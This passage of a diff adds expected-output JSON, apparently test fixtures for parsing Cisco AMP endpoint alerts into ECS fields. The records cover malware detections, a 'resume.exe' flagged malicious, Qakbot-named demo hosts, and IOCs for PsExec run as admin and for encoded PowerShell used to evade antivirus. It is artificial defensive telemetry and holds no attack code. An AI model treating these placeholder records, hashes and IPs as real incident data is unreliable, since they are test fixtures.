"preserve_original_event" + ] + }, + { + "process": { + "name": "csc.exe", + "pid": 6708, + "hash": { + "sha1": "93cf877f5627e55ec076a656e935042fac39950e", + "sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57", + "md5": "23ee3d381cfe3b9f6229483e2ce2f9e1" + } + }, + "@timestamp": "2021-01-14T10:01:50.000Z", + "file": { + "name": "p3fci4nu.dll", + "path": "\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll", + "hash": { + "sha256": "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_BP_WMIPRVSE" + ], + "hash": [ + "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_BP_WMIPRVSE", + "hostname": "Demo_BP_WMIPRVSE", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701372604Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6880587030380676000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "detection": "Generic.Malware.WX.9E93D282", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "be:b0:d5:89:e2:96", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Unknown", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "be:b0:d5:89:e2:96" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6880587021790740668", + "event_type_id": 1090519054 + } + }, + "tags": [ + 
"preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + } + }, + "@timestamp": "2021-01-14T09:56:55.000Z", + "file": { + "name": "PsExec.exe", + "path": "file:///C%3A/share%24/PsExec.exe", + "hash": { + "sha256": "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "hash": [ + "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701374528Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as 
admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", + "kind": "alert", + "start": "2021-01-14T09:56:55.000Z", + "action": "Cloud IOC", + "id": "460392585524661250", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PsexecAsAdmin.ioc", + "description": "The psexec utility was executed as admin." 
+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T07:56:40.000Z", + "file": { + "name": "resume.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "hash": { + "sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "md5": "41476df3138717868118d8542cf3d1d6" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 0, + "ingested": "2021-09-12T17:32:35.701376409Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch 
Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "kind": "alert", + "action": "File Fetch Completed", + "id": "6508191586038317000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648173 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + } + }, + "@timestamp": "2021-01-14T05:49:06.000Z", + "file": { + "name": "powershell.exe", + "path": "file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "hash": { + "sha256": "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "hash": [ + "a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:35.701378300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", + "kind": "alert", + "start": "2021-01-14T05:49:06.000Z", + "action": "Cloud IOC", + "id": "7007136035192884000", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.PowershellEncodedBuffer.ioc", + "description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools." 
+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T00:37:44.000Z", + "file": { + "name": "resume.exe", + "hash": { + "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701380257Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", + "kind": "alert", + "action": "Threat Detected in Low Prevalence Executable", + "id": "1515350231459808800", + 
"category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296278 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T00:27:10.000Z", + "file": { + "name": "resume.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "hash": { + "sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "md5": "41476df3138717868118d8542cf3d1d6" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP" + ], + "hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_AMP", + "hostname": "Demo_AMP" + }, + "event": { + "severity": 0, + "ingested": "2021-09-12T17:32:35.701382106Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch 
Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", + "kind": "alert", + "action": "File Fetch Completed", + "id": "6508191586038317000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "38:1e:eb:ba:2c:15", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "38:1e:eb:ba:2c:15" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648173 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T00:02:08.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:35.701383971Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6583671182384431000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "file": { + "hash": { + "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, 
+ "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701385864Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine Attempt Failed", + "id": "6411132837046518000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], 
+ "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6411132837046517762", + "event_type_id": 2164260893 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "file": { + "hash": { + "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701387740Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6411132837046518000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "detection_id": "6411132837046517761", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "file": { + "name": "11179468.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "hash": { + "sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + 
"platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701389617Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective 